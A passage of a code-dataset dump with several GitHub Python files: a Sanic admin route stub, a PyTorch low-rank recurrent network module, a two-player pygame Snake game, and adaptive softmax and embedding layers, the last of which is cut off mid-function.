","repo_name":"Aman08-forsk/FSDP_2019","sub_path":"Day02/pangram.py","file_name":"pangram.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7321236381","text":"from common import common_global\nfrom sanic import Blueprint\n\nblueprint_admin_emulation = Blueprint('name_blueprint_admin_emulation', url_prefix='/admin')\n\n\n@blueprint_admin_emulation.route(\"/admin_emulation\", methods=[\"GET\", \"POST\"])\n@common_global.jinja_template.template('bss_admin/bss_admin_emulation.html')\n@common_global.auth.login_required\nasync def url_bp_emulation(request):\n \"\"\"\n Game metadata stats and update screen\n \"\"\"\n data_mame_version = None\n return {\n 'data_mame_version': data_mame_version,\n }\n","repo_name":"MediaKraken/MediaKraken_Deployment","sub_path":"source/web_app_sanic/blueprint/admin/bp_admin_emulation.py","file_name":"bp_admin_emulation.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"3"} +{"seq_id":"8900734511","text":"\nimport torch\nimport torch.nn as nn\nfrom pathlib import Path\nimport os\nimport numpy as np\nimport json\n\nclass Net(nn.Module):\n def __init__(self, input_size, hidden_size, output_size):\n super(Net, self).__init__()\n self.lstm = nn.LSTM(input_size, hidden_size)\n self.linear = nn.Linear(hidden_size, output_size)\n\n def forward(self, x):\n out, hidden = self.lstm(x)\n x = self.linear(out)\n return x, out\n\nclass CTRNN(nn.Module):\n \"\"\"Continuous-time RNN.\n\n Args:\n input_size: Number of input neurons\n hidden_size: Number of hidden neurons\n\n Inputs:\n input: (seq_len, batch, input_size), network input\n hidden: (batch, hidden_size), initial hidden activity\n \"\"\"\n\n def __init__(self, input_size, hidden_size,tf,rank=1,dt=None, noise=1, device='cpu',**kwargs):\n super().__init__()\n self.input_size = input_size\n self.hidden_size = hidden_size\n self.tau = 100\n if dt is None:\n alpha = 1\n else:\n alpha = dt / self.tau\n self.alpha = alpha\n self.oneminusalpha = 1 - alpha\n self.tf = tf\n\n #self.input2h = nn.Linear(input_size, hidden_size,bias=False)\n #self.input2h.requires_grad_(False)\n\n # self.input_stim = nn.Parameter(torch.randn(2, hidden_size))#.to(device)#.detach()\n # self.input_stim.requires_grad_(False)\n # self.input_ctx= nn.Parameter(torch.randn(2, hidden_size))#.to(device)#.detach()\n\n self.IA = nn.Parameter(torch.randn(1,hidden_size).type(torch.float))\n self.IA.requires_grad_(False)\n\n self.IB =nn.Parameter(torch.randn(1,hidden_size).type(torch.float))\n self.IB.requires_grad_(False)\n\n self.IXA = nn.Parameter(torch.randn(1,hidden_size).type(torch.float))\n self.IXB =nn.Parameter(torch.randn(1,hidden_size).type(torch.float))\n \n #self.IXA.requires_grad_(False)\n #self.IXB.requires_grad_(False)\n\n\n #self.m = nn.Parameter(torch.randn(hidden_size,rank).type(torch.float)/self.hidden_size)\n #self.n =nn.Parameter(torch.randn(hidden_size,rank).type(torch.float)/self.hidden_size)\n \n self.m = nn.Parameter(torch.randn(hidden_size).type(torch.float)/self.hidden_size)\n self.n =nn.Parameter(torch.randn(hidden_size).type(torch.float)/self.hidden_size)\n \n \n #self.m2 = nn.Parameter(torch.randn(hidden_size).type(torch.float)/self.hidden_size)\n #self.n2 =nn.Parameter(torch.randn(hidden_size).type(torch.float)/self.hidden_size)\n\n\n #self.m.requires_grad_(False)\n #self.n.requires_grad_(False)\n\n\n self.noise = noise\n self.device = device\n \n def init_hidden(self, input_shape):\n batch_size = input_shape[1]\n\n return torch.zeros(batch_size, self.hidden_size) \n\n def recurrence(self, input, hidden):\n \n\n stims_input,ctx_input = input[:,:2],input[:,2:]\n A,B,XA,XB = input[:,0],input[:,1],input[:,2],input[:,3]\n # W = torch.mm(self.m,self.n.T) #+ \n W = torch.outer(self.m,self.n.T)\n\n #pre_activation = torch.mm(stims_input,self.input_stim) + torch.mm(ctx_input,self.input_ctx) + torch.mm(torch.outer(self.m,self.n.T),torch.tanh(hidden).T).T \n\n \n pre_activation =A[:,None] @ self.IA + B[:,None] @ self.IB + \\\n XA[:,None] @ self.IXA + XB[:,None] @ self.IXB + \\\n torch.mm(W,self.tf(hidden).T).T \n\n rec_noise = torch.randn(self.hidden_size)*self.noise\n rec_noise = torch.randn(pre_activation.shape)*self.noise\n pre_activation += rec_noise.to(input.device)\n \n # pre_activation = self.input2h(input) + torch.mm(torch.matmul(self.m[:,None],self.n[None,:]),torch.tanh(hidden).T).T \n\n #h_new = torch.tanh(hidden) * self.oneminusalpha + pre_activation * self.alpha\n h_new = hidden * self.oneminusalpha + pre_activation * self.alpha\n return h_new,pre_activation\n\n def forward(self, input, hidden=None):\n \"\"\"Propogate input through the network.\"\"\"\n if hidden is None:\n hidden = self.init_hidden(input.shape).to(input.device)\n\n output = []\n steps = range(input.size(0))\n X = []\n for i in steps:\n hidden, x = self.recurrence(input[i], hidden)\n output.append(hidden)\n X.append(x)\n\n output = torch.cat(output, 0).view(input.size(0), *output[0].size())\n X = torch.cat(X, 0).view(input.size(0), *X[0].size())\n\n return output, hidden, X\n\n\nclass RNNNet(nn.Module):\n \"\"\"Recurrent network model.\n\n Args:\n input_size: int, input size\n hidden_size: int, hidden size\n output_size: int, output size\n rnn: str, type of RNN, lstm, rnn, ctrnn, or eirnn\n \"\"\"\n def __init__(self, input_size, hidden_size, output_size, noise, tf=torch.tanh,device=\"cpu\",**kwargs):\n super().__init__()\n\n # Continuous time RNN\n self.rnn = CTRNN(input_size, hidden_size, tf,noise=noise,device=device,**kwargs)\n self.fc = nn.Parameter(torch.randn(hidden_size, output_size)/hidden_size) #nn.Linear(hidden_size, output_size)\n #self.fc = nn.Linear(hidden_size, output_size)\n self.tf = tf\n self.fc.requires_grad_(False)\n\n def forward(self, x):\n rnn_activity, _, X = self.rnn(x)\n out = rnn_activity @ self.fc\n\n #out = self.fc(rnn_activity)\n\n return out, rnn_activity\n \n def set_vecs(self,n1, m1, w, IA, IB, IctxA, IctxB):\n \n self.fc = nn.Parameter(w)\n self.rnn.n = nn.Parameter(n1)\n self.rnn.m = nn.Parameter(m1)\n self.rnn.IA = nn.Parameter(IA)\n self.rnn.IB = nn.Parameter(IB)\n self.rnn.IXA = nn.Parameter(IctxA)\n self.rnn.IXB = nn.Parameter(IctxB)\n\n\n\n \ndef test_net(net=None,env=None,envid=None,num_trials=100,device=\"cuda\"):\n\n with torch.no_grad():\n\n # if no network provided, load it \n # and infer environment from envid\n if net == None:\n assert envid, env\n modelpath = get_modelpath(envid)\n\n with open(modelpath / 'config.json') as f:\n config = json.load(f)\n \n net = RNNNet(input_size=env.observation_space.shape[0],\n hidden_size=config['hidden_size'],\n output_size=env.action_space.n,noise=config['noise'])\n net.load_state_dict(torch.load(modelpath / 'net.pth'))\n\n all_obs = []\n all_gts = []\n activity = []\n all_choices=[]\n X = []\n for i in range(num_trials):\n env.new_trial()\n ob, gt = env.ob, env.gt\n inputs = torch.from_numpy(ob[:, np.newaxis, :]).type(torch.float)\n action_pred, hidden = net(inputs.to(device))\n\n # Compute performance\n action_pred = action_pred.cpu().detach().numpy()\n #choice = action_pred[-1, 0, 0]\n choice = action_pred[-1, 0]\n all_choices.append(choice)\n all_gts.append(gt[-1])\n correct = abs(choice-gt[-1])\n all_obs.append(ob)\n\n # Log stimulus period activity\n activity.append(hidden.cpu().detach().numpy()[:, 0, :])\n #X.append(x.cpu().detach().numpy()[:, 0, :])\n\n act = torch.tensor(activity).cpu().type(torch.float)\n #inputs = torch.tensor(X).cpu().type(torch.float)\n z = act @ net.rnn.m.detach().cpu().type(torch.float)\n gts = np.array(all_gts)\n choices = np.array(all_choices)\n obs = np.array(all_obs)\n\n return z, act, obs, gts, choices\n \ndef get_modelpath(envid):\n # Make a local file directories\n path = Path('nets/') / 'files'\n os.makedirs(path, exist_ok=True)\n path = path / envid\n os.makedirs(path, exist_ok=True)\n return path\n\ndef make_vecs(net):\n \"\"\"\n return a list of vectors (list of numpy arrays of shape n) composing a network\n \"\"\"\n inputs = np.squeeze([v.detach().cpu().numpy() for v in [net.rnn.IA, net.rnn.IB,net.rnn.IXA,net.rnn.IXB]])\n w = list(net.fc.detach().cpu().numpy().T)\n \n \n return np.array([net.rnn.n.detach().cpu().numpy(), net.rnn.m.detach().cpu().numpy()] + w + list(inputs))\n return np.array(list(net.rnn.n.detach().cpu().numpy().T) + list(net.rnn.m.detach().cpu().numpy().T) + w + list(inputs)).T\n\n\ndef load_net(envid, env,device=\"cpu\"):\n \n modelpath = get_modelpath(envid)\n with open(modelpath / 'config.json') as f:\n config = json.load(f)\n net = RNNNet(input_size=env.observation_space.shape[0],\n hidden_size=config['hidden_size'],\n output_size=env.action_space.n,noise=config['noise'],dt=config['dt'])\n net.load_state_dict(torch.load(modelpath / 'net.pth', map_location=torch.device(device)))\n\n return net\n \n","repo_name":"jmourabarbosa/multi-area-ctx","sub_path":"helpers/my_vanilla_lowRankRNN.py","file_name":"my_vanilla_lowRankRNN.py","file_ext":"py","file_size_in_byte":8635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23761373294","text":"import random\r\nfrom collections import deque\r\nimport pyautogui\r\n\r\nimport pygame\r\nimport sys\r\nfrom pygame.locals import *\r\n\r\n# pygame.display.Info().current_w\r\n# pygame.display.Info().current_h\r\nGAME_CELL_SIZE_PX = 20\r\nWIDTH, HEIGHT = pyautogui.size()\r\nGAME_CELLS_X = WIDTH // GAME_CELL_SIZE_PX\r\nGAME_CELLS_Y = (HEIGHT - 100) // GAME_CELL_SIZE_PX\r\n\r\nFPS = 120\r\nMPS = 10\r\n\r\nFRAMES_PER_MOVE = FPS // MPS\r\n\r\nrandom.seed(a=1)\r\n\r\nBLACK = (0, 0, 0)\r\nRED = (255, 0, 0)\r\nGREEN = (0, 255, 0)\r\nBLUE = (0, 0, 255)\r\nGRAY = (200, 200, 200)\r\nPINK = (255, 192, 203)\r\nORANGE = (255, 165, 0)\r\n\r\nbackground_color = BLACK\r\n\r\n\r\ndef draw_segment(surface, x, y, color):\r\n COLOR = color\r\n position = (\r\n x * GAME_CELL_SIZE_PX,\r\n y * GAME_CELL_SIZE_PX,\r\n GAME_CELL_SIZE_PX,\r\n GAME_CELL_SIZE_PX\r\n )\r\n pygame.draw.rect(surface, COLOR, position)\r\n\r\n\r\ndef draw_food(surface, x, y):\r\n RED = (255, 0, 0)\r\n position = (\r\n x * GAME_CELL_SIZE_PX + GAME_CELL_SIZE_PX // 2,\r\n y * GAME_CELL_SIZE_PX + GAME_CELL_SIZE_PX // 2\r\n )\r\n pygame.draw.circle(surface, RED, position, GAME_CELL_SIZE_PX // 2)\r\n\r\n\r\nclass Snake:\r\n vectors = {\r\n 'UP': (0, -1),\r\n 'DOWN': (0, 1),\r\n 'LEFT': (-1, 0),\r\n 'RIGHT': (1, 0)\r\n }\r\n\r\n def __init__(self, food):\r\n self.segments = deque([[GAME_CELLS_X - 0, GAME_CELLS_Y // 2], [GAME_CELLS_X - 1, GAME_CELLS_Y // 2],\r\n [GAME_CELLS_X - 2, GAME_CELLS_Y // 2], [GAME_CELLS_X - 3, GAME_CELLS_Y // 2],\r\n [GAME_CELLS_X - 4, GAME_CELLS_Y // 2], [GAME_CELLS_X - 5, GAME_CELLS_Y // 2]])\r\n self.direction = 'LEFT'\r\n self.last_direction = self.direction\r\n self.food = food\r\n\r\n def _normalize_segments(self):\r\n for segment in self.segments:\r\n\r\n if segment[0] >= GAME_CELLS_X:\r\n segment[0] -= GAME_CELLS_X\r\n if segment[0] < 0:\r\n segment[0] += GAME_CELLS_X\r\n if segment[1] >= GAME_CELLS_Y:\r\n segment[1] -= GAME_CELLS_Y\r\n if segment[1] < 0:\r\n segment[1] += GAME_CELLS_Y\r\n\r\n def move(self):\r\n vector = self.vectors.get(self.direction, (0, 0))\r\n self.last_direction = self.direction\r\n first_segment = self.segments[-1]\r\n self.segments.append(\r\n [first_segment[0] + vector[0], first_segment[1] + vector[1]]\r\n )\r\n self._normalize_segments()\r\n if not self.try_to_eat():\r\n self.segments.popleft()\r\n\r\n def draw(self, surface):\r\n for segment in self.segments:\r\n draw_segment(surface, *segment, (0, 0, 255))\r\n draw_segment(surface, *self.segments[-1], (255, 255, 255))\r\n\r\n def process_event(self, event):\r\n if event.type == KEYDOWN:\r\n if event.key == K_LEFT:\r\n if not self.last_direction == 'RIGHT':\r\n self.direction = 'LEFT'\r\n elif event.key == K_RIGHT:\r\n if not self.last_direction == 'LEFT':\r\n self.direction = 'RIGHT'\r\n elif event.key == K_UP:\r\n if not self.last_direction == 'DOWN':\r\n self.direction = 'UP'\r\n elif event.key == K_DOWN:\r\n if not self.last_direction == 'UP':\r\n self.direction = 'DOWN'\r\n\r\n def try_to_eat(self):\r\n if (\r\n self.segments[-1][0] == self.food.x\r\n and\r\n self.segments[-1][1] == self.food.y\r\n ):\r\n self.food.eaten()\r\n return True\r\n return False\r\n\r\n def check(self, snake):\r\n for segment in snake.segments:\r\n if self.segments[-1] == segment:\r\n return True\r\n for segment in self.segments:\r\n if self.segments[-1] == segment:\r\n if not self.segments[-1] is segment:\r\n return True\r\n return False\r\n\r\n\r\nclass Snake2:\r\n vectors = {\r\n 'UP': (0, -1),\r\n 'DOWN': (0, 1),\r\n 'LEFT': (-1, 0),\r\n 'RIGHT': (1, 0)\r\n }\r\n\r\n def __init__(self, food):\r\n self.segments = deque(\r\n [[0, GAME_CELLS_Y // 2], [1, GAME_CELLS_Y // 2], [2, GAME_CELLS_Y // 2], [3, GAME_CELLS_Y // 2],\r\n [4, GAME_CELLS_Y // 2], [5, GAME_CELLS_Y // 2]])\r\n\r\n self.direction = 'RIGHT'\r\n self.last_direction = self.direction\r\n self.food = food\r\n self.color = (0, 255, 0)\r\n\r\n def _normalize_segments(self):\r\n for segment in self.segments:\r\n if segment[0] >= GAME_CELLS_X:\r\n segment[0] -= GAME_CELLS_X\r\n if segment[0] < 0:\r\n segment[0] += GAME_CELLS_X\r\n if segment[1] >= GAME_CELLS_Y:\r\n segment[1] -= GAME_CELLS_Y\r\n if segment[1] < 0:\r\n segment[1] += GAME_CELLS_Y\r\n\r\n def move(self):\r\n vector = self.vectors.get(self.direction, (0, 0))\r\n self.last_direction = self.direction\r\n first_segment = self.segments[-1]\r\n self.segments.append(\r\n [first_segment[0] + vector[0], first_segment[1] + vector[1]]\r\n )\r\n self._normalize_segments()\r\n if not self.try_to_eat():\r\n self.segments.popleft()\r\n\r\n def draw(self, surface):\r\n for segment in self.segments:\r\n draw_segment(surface, *segment, self.color)\r\n draw_segment(surface, *self.segments[-1], (255, 255, 255))\r\n\r\n def process_event(self, event):\r\n if event.type == KEYDOWN:\r\n if event.key == K_a:\r\n if not self.last_direction == 'RIGHT':\r\n self.direction = 'LEFT'\r\n elif event.key == K_d:\r\n if not self.last_direction == 'LEFT':\r\n self.direction = 'RIGHT'\r\n elif event.key == K_w:\r\n if not self.last_direction == 'DOWN':\r\n self.direction = 'UP'\r\n elif event.key == K_s:\r\n if not self.last_direction == 'UP':\r\n self.direction = 'DOWN'\r\n\r\n def try_to_eat(self):\r\n if (\r\n self.segments[-1][0] == self.food.x\r\n and\r\n self.segments[-1][1] == self.food.y\r\n ):\r\n self.food.eaten()\r\n return True\r\n return False\r\n\r\n def check(self, snake):\r\n for segment in snake.segments:\r\n if self.segments[-1] == segment:\r\n return True\r\n for segment in self.segments:\r\n if self.segments[-1] == segment:\r\n if not self.segments[-1] is segment:\r\n return True\r\n return False\r\n\r\n\r\nclass FoodProvider:\r\n def __init__(self):\r\n self._get_new_cords()\r\n\r\n def _get_new_cords(self):\r\n self.x = random.randrange(GAME_CELLS_X)\r\n self.y = random.randrange(GAME_CELLS_Y)\r\n global MPS, FRAMES_PER_MOVE\r\n MPS = MPS + 1\r\n FRAMES_PER_MOVE = FPS // MPS\r\n\r\n def draw(self, surface):\r\n draw_food(surface, self.x, self.y)\r\n\r\n def eaten(self):\r\n global background_color\r\n background_color = (random.randrange(0, 255), random.randrange(0, 255), random.randrange(0, 255))\r\n self._get_new_cords()\r\n\r\n\r\ndef draw_background(surface):\r\n position = (\r\n 0, 0,\r\n # GAME_CELLS_X * GAME_CELL_SIZE_PX,\r\n # GAME_CELLS_Y * GAME_CELL_SIZE_PX\r\n WIDTH,\r\n HEIGHT\r\n )\r\n position2 = (\r\n 0, HEIGHT - 100,\r\n WIDTH,\r\n 100\r\n )\r\n position3 = (\r\n 0, HEIGHT - 100,\r\n WIDTH,\r\n 10\r\n )\r\n pygame.draw.rect(surface, background_color, position)\r\n pygame.draw.rect(surface, GRAY, position2)\r\n pygame.draw.rect(surface, BLACK, position3)\r\n\r\n\r\ndef run_game():\r\n pygame.init()\r\n pygame.mixer.quit()\r\n\r\n fpsClock = pygame.time.Clock()\r\n DISPLAYSURF = pygame.display.set_mode(\r\n (\r\n # GAME_CELLS_X * GAME_CELL_SIZE_PX,\r\n # GAME_CELLS_Y * GAME_CELL_SIZE_PX\r\n pygame.display.Info().current_w,\r\n pygame.display.Info().current_h\r\n )\r\n )\r\n pygame.display.set_caption('Moving segments with snake class')\r\n food = FoodProvider()\r\n snake = Snake(food=food)\r\n snake2 = Snake2(food=food)\r\n frames_elapsed_since_last_move = 0\r\n text = ''\r\n game_is_going = True\r\n font = pygame.font.SysFont(\"comicsansms\", 50)\r\n while game_is_going:\r\n for event in pygame.event.get():\r\n # print('event: {}'.format(event))\r\n if event.type == QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n if event.type == KEYDOWN:\r\n if event.key == K_ESCAPE:\r\n pygame.quit()\r\n sys.exit()\r\n snake.process_event(event)\r\n snake2.process_event(event)\r\n draw_background(DISPLAYSURF)\r\n snake.draw(DISPLAYSURF)\r\n snake2.draw(DISPLAYSURF)\r\n if snake2.check(snake):\r\n game_is_going = False\r\n text = 'arrows won'\r\n if snake.check(snake2):\r\n game_is_going = False\r\n text = 'wasd won'\r\n food.draw(DISPLAYSURF)\r\n frames_elapsed_since_last_move += 1\r\n if frames_elapsed_since_last_move >= FRAMES_PER_MOVE:\r\n frames_elapsed_since_last_move = 0\r\n snake.move()\r\n snake2.move()\r\n global MPS\r\n speed_text = 'speed: ' + str(MPS)\r\n wasd_text = 'wasd score: ' + str(len(snake2.segments) - 6)\r\n arrows_text = 'arrows score: ' + str(len(snake.segments) - 6)\r\n img = font.render(speed_text, True, (0, 0, 0))\r\n a = img.get_rect().width\r\n wasd_img = font.render(wasd_text, True, (0, 0, 0))\r\n arrows_img = font.render(arrows_text, True, (0, 0, 0))\r\n DISPLAYSURF.blit(img, (WIDTH // 2 - a // 2, HEIGHT - 80))\r\n DISPLAYSURF.blit(wasd_img, (WIDTH // 10, HEIGHT - 80))\r\n b = arrows_img.get_rect().width\r\n DISPLAYSURF.blit(arrows_img, (WIDTH - b - WIDTH // 10, HEIGHT - 80))\r\n pygame.display.update()\r\n fpsClock.tick(FPS)\r\n\r\n img = font.render(text, True, (0, 0, 0))\r\n\r\n while not game_is_going:\r\n for event in pygame.event.get():\r\n if event.type == QUIT:\r\n game_is_going = True\r\n if event.type == KEYDOWN:\r\n if event.key == K_SPACE:\r\n global background_color\r\n background_color = BLACK\r\n MPS = 10\r\n run_game()\r\n if event.key == K_ESCAPE:\r\n pygame.quit()\r\n sys.exit()\r\n\r\n DISPLAYSURF.fill((255, 255, 255))\r\n DISPLAYSURF.blit(img, (20, 120))\r\n pygame.display.update()\r\n\r\n pygame.quit()\r\n\r\n\r\nif __name__ == '__main__':\r\n run_game()\r\n","repo_name":"causesauce/snake_game_2d","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8155609894","text":"from typing import Optional, Sequence, Tuple, List\nimport torch\nimport torch.nn.functional as F\n\nfrom nnlib.nn.modules import BaseModule, Linear, Embedding, Sequential, ModuleList\n\n\ndef _preprocess_cutoffs(cutoffs: Sequence[int], num_classes: int) -> List[int]:\n cutoffs = sorted(list(cutoffs))\n\n if len(cutoffs) > 0:\n if cutoffs[-1] == num_classes:\n cutoffs = cutoffs[:-1]\n if cutoffs[0] == 0:\n cutoffs = cutoffs[1:]\n\n if len(cutoffs) > 0:\n if (cutoffs != sorted(cutoffs)) or \\\n (min(cutoffs) < 0) or \\\n (max(cutoffs) >= num_classes) or \\\n (len(set(cutoffs)) != len(cutoffs)) or \\\n any([int(c) != c for c in cutoffs]):\n raise ValueError(\n \"[ERROR:NN] AdaptiveLogSoftmaxWithLoss cutoff should be a sequence of unique, positive integers \"\n \"sorted in an increasing order, each value is between [1, num_classes).\")\n else: # len(cutoffs) == 0:\n raise ValueError(\"[ERROR:NN] Cutoffs empty. Consider using native softmax\")\n\n return cutoffs\n\n\nclass AdaptiveLogSoftmaxWithLoss(BaseModule):\n\n def __init__(self,\n num_classes: int,\n num_features: int,\n cutoffs: Sequence[int],\n div_value: float = 4.0,\n bias: bool = True,\n shortlist_proj: bool = False,\n reduction: str = \"mean\") -> None:\n super(AdaptiveLogSoftmaxWithLoss, self).__init__()\n\n cutoffs = _preprocess_cutoffs(cutoffs, num_classes)\n\n self.num_features = num_features\n self.num_classes = num_classes\n\n self.cutoffs = cutoffs + [num_classes] # [1000, 5000,] + [10000]: last index of each\n assert len(self.cutoffs) >= 2\n self.div_value = div_value\n self.use_bias = bias\n self.use_shortlist_proj = shortlist_proj\n self.reduction = reduction\n\n self.shortlist_size = self.cutoffs[0]\n self.n_clusters = len(self.cutoffs) - 1\n\n if not shortlist_proj:\n self.shortlist = Sequential(\n Linear(self.num_features, self.shortlist_size, bias=bias),\n ) # for consistency (nn.Sequential)\n else:\n self.shortlist = Sequential(\n Linear(self.num_features, self.num_features, bias=False),\n Linear(self.num_features, self.shortlist_size, bias=bias) # embedding\n )\n self.cluster = Linear(self.num_features, self.n_clusters, bias=bias)\n\n self.tail = ModuleList()\n for i in range(self.n_clusters):\n out_size = self.cutoffs[i + 1] - self.cutoffs[i]\n if div_value == 1:\n self.tail.append(Sequential(\n Linear(self.num_features, out_size, bias=bias), # embedding\n )) # for consistency (nn.Sequential)\n else:\n head_size = int(num_features / (self.div_value ** (i + 1)))\n self.tail.append(Sequential(\n Linear(self.num_features, head_size, bias=False),\n Linear(head_size, out_size, bias=bias) # embedding\n ))\n\n def forward(self, x: torch.Tensor, target: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:\n if x.shape[0] != target.shape[0]:\n raise RuntimeError(f\"[ERROR:NN] Target and Input should have same batch dimension. \"\n f\"Shape of input: {x.shape}, target: {target.shape}\")\n\n used_rows = 0\n batch_size = target.shape[0]\n\n # output = x.new_zeros(batch_size) # target log probabilities (N,)\n output = torch.zeros(batch_size, dtype=torch.float32, device=x.device)\n gather_idx = target.new_empty(batch_size)\n\n cutoff_values = [0] + self.cutoffs\n for i in range(len(cutoff_values) - 1):\n low_idx = cutoff_values[i]\n high_idx = cutoff_values[i + 1]\n\n target_mask = torch.logical_and(torch.ge(target, low_idx), torch.lt(target, high_idx))\n row_indices = torch.nonzero(target_mask, as_tuple=True)[0]\n\n # no target is in batch\n if row_indices.numel() == 0:\n continue\n\n if i == 0: # shortlist\n # keep as-is in head label\n gather_idx.index_copy_(0, row_indices, target[target_mask])\n else:\n relative_target = target[target_mask] - low_idx\n x_subset = x.index_select(0, row_indices)\n\n cluster_output = self.tail[i - 1](x_subset)\n cluster_index = self.shortlist_size + i - 1\n\n # fill head label of cluster to cluster index\n gather_idx.index_fill_(0, row_indices, cluster_index)\n\n cluster_log_prob = F.log_softmax(cluster_output, dim=1)\n local_log_prob = cluster_log_prob.gather(1, relative_target.unsqueeze(1))\n output.index_copy_(0, row_indices, local_log_prob.squeeze(1))\n\n used_rows += row_indices.numel()\n\n if used_rows != batch_size:\n raise RuntimeError(f\"[ERROR:NN] Not all consumed. Should be {batch_size} but only used {used_rows}.\")\n\n short_output = self.shortlist(x) # (batch_size, shortlist_size)\n cluster_output = self.cluster(x) # (batch_size, n_clusters)\n head_output = torch.cat([short_output, cluster_output], dim=1) # (batch_size, shortlist_size + n_clusters)\n\n head_log_prob = F.log_softmax(head_output, dim=-1)\n # for word in shortlist: log(shortlist_prob_of_head)\n # for word in cluster: log(cluster_prob_of_head) + log(prob_in_cluster)\n output = output + head_log_prob.gather(1, gather_idx.unsqueeze(1)).squeeze()\n\n if self.reduction == \"mean\":\n loss = (-output).mean()\n elif self.reduction == \"sum\":\n loss = (-output).sum()\n else:\n loss = -output # no reduction\n\n return output, loss\n\n def _get_full_log_prob(self, x: torch.Tensor, head_output: torch.Tensor) -> torch.Tensor:\n \"\"\" Given input tensor, and output of `self.head`,\n compute the log of the full distribution \"\"\"\n\n batch_size = x.shape[0]\n\n out = x.new_empty(batch_size, self.num_classes)\n head_log_prob = F.log_softmax(head_output, dim=1)\n\n # copy shortlist prob\n out[:, :self.shortlist_size] = head_log_prob[:, :self.shortlist_size]\n\n for i, (start_idx, stop_idx) in enumerate(zip(self.cutoffs, self.cutoffs[1:])):\n cluster_output = self.tail[i](x)\n cluster_log_prob = F.log_softmax(cluster_output, dim=1)\n output_log_prob = cluster_log_prob + head_log_prob[:, self.shortlist_size + i].unsqueeze(1)\n\n out[:, start_idx:stop_idx] = output_log_prob\n return out\n\n def log_prob(self, x: torch.Tensor) -> torch.Tensor:\n \"\"\" Computes log probabilities for all num_classes\"\"\"\n\n short_output = self.shortlist(x) # (batch_size, shortlist_size)\n cluster_output = self.cluster(x) # (batch_size, n_clusters)\n head_output = torch.cat([short_output, cluster_output], dim=1) # (batch_size, shortlist_size + n_clusters)\n\n return self._get_full_log_prob(x, head_output)\n\n def predict(self, x: torch.Tensor) -> torch.Tensor:\n \"\"\" This is equivalent to `self.log_prob(input).argmax(dim=1)`\"\"\"\n\n short_output = self.shortlist(x) # (batch_size, shortlist_size)\n cluster_output = self.cluster(x) # (batch_size, n_clusters)\n head_output = torch.cat([short_output, cluster_output], dim=1) # (batch_size, shortlist_size + n_clusters)\n\n output = torch.argmax(head_output, dim=1)\n not_in_shortlist = torch.ge(output, self.shortlist_size)\n all_in_shortlist = not (not_in_shortlist.any())\n\n if all_in_shortlist:\n return output\n\n elif not_in_shortlist.all():\n log_prob = self._get_full_log_prob(x, head_output)\n return torch.argmax(log_prob, dim=1)\n\n else:\n log_prob = self._get_full_log_prob(x[not_in_shortlist], head_output[not_in_shortlist])\n output[not_in_shortlist] = torch.argmax(log_prob, dim=1)\n return output\n\n def extra_repr(self) -> str:\n s = f\"{self.num_classes}, {self.num_features}, cutoffs={self.cutoffs[:-1]}, div_value={self.div_value}\"\n if self.use_bias:\n s += f\", bias={self.use_bias}\"\n if self.use_shortlist_proj:\n s += f\", shortlist_proj={self.use_shortlist_proj}\"\n return s\n\n\nclass AdaptiveEmbedding(BaseModule):\n\n def __init__(self,\n num_classes: int,\n num_features: int,\n cutoffs: Sequence[int],\n div_value: float = 4.0,\n padding_idx: Optional[int] = None,\n shortlist_proj: bool = False,\n word_drop_prob: float = 0.0):\n super(AdaptiveEmbedding, self).__init__()\n\n cutoffs = _preprocess_cutoffs(cutoffs, num_classes)\n\n self.num_features = num_features\n self.num_classes = num_classes\n\n self.cutoffs = cutoffs + [num_classes] # [1000, 5000,] + [10000]: last index of each\n assert len(self.cutoffs) >= 2\n self.div_value = div_value\n self.use_shortlist_proj = shortlist_proj\n self.padding_idx = padding_idx\n\n self.shortlist_size = self.cutoffs[0]\n self.n_clusters = len(self.cutoffs) - 1\n\n if not shortlist_proj:\n self.shortlist = Sequential(\n Embedding(self.shortlist_size, num_features, padding_idx=padding_idx,\n word_drop_prob=word_drop_prob),\n ) # for consistency (nn.Sequential)\n else:\n self.shortlist = Sequential(\n Embedding(self.shortlist_size, num_features, padding_idx=padding_idx,\n word_drop_prob=word_drop_prob),\n Linear(num_features, num_features, bias=False)\n )\n\n self.tail = ModuleList()\n for i in range(self.n_clusters):\n out_size = self.cutoffs[i + 1] - self.cutoffs[i]\n if div_value == 1:\n self.tail.append(Sequential(\n Embedding(out_size, num_features, padding_idx=padding_idx,\n word_drop_prob=word_drop_prob),\n )) # for consistency (nn.Sequential)\n else:\n head_size = int(num_features / (self.div_value ** (i + 1)))\n self.tail.append(Sequential(\n Embedding(out_size, head_size, padding_idx=padding_idx,\n word_drop_prob=word_drop_prob),\n Linear(head_size, num_features, bias=False),\n ))\n\n def forward(self, indices: torch.Tensor) -> torch.Tensor:\n sequence_len, batch_size = indices.shape\n target = indices.view(-1)\n\n dtype = self.tail[0][-1].weight.dtype\n device = self.tail[0][-1].weight.device\n output = torch.zeros(sequence_len * batch_size, self.num_features, dtype=dtype, device=device)\n\n used_rows = 0\n cutoff_values = [0] + self.cutoffs\n for i in range(len(cutoff_values) - 1):\n low_idx = cutoff_values[i]\n high_idx = cutoff_values[i + 1]\n\n target_mask = torch.logical_and(torch.ge(target, low_idx), torch.lt(target, high_idx))\n row_indices = torch.nonzero(target_mask, as_tuple=True)[0]\n\n # no target is in batch\n if row_indices.numel() == 0:\n continue\n\n if i == 0: # shortlist\n # keep as-is in head label\n proj = self.shortlist(target[target_mask])\n if output.dtype != proj.dtype: # ad-hoc fix\n output = output.to(proj.dtype)\n if output.device != proj.device: # ad-hoc fix\n output = output.to(proj.device)\n output.index_copy_(0, row_indices, proj)\n else:\n relative_target = target[target_mask] - low_idx\n proj = self.tail[i - 1](relative_target)\n output.index_copy_(0, row_indices, proj)\n\n used_rows += row_indices.numel()\n\n if used_rows != output.shape[0]:\n raise RuntimeError(f\"[ERROR:NN] Not all consumed. Should be {output.shape[0]} but only used {used_rows}.\")\n\n output = output.view(sequence_len, batch_size, self.num_features)\n 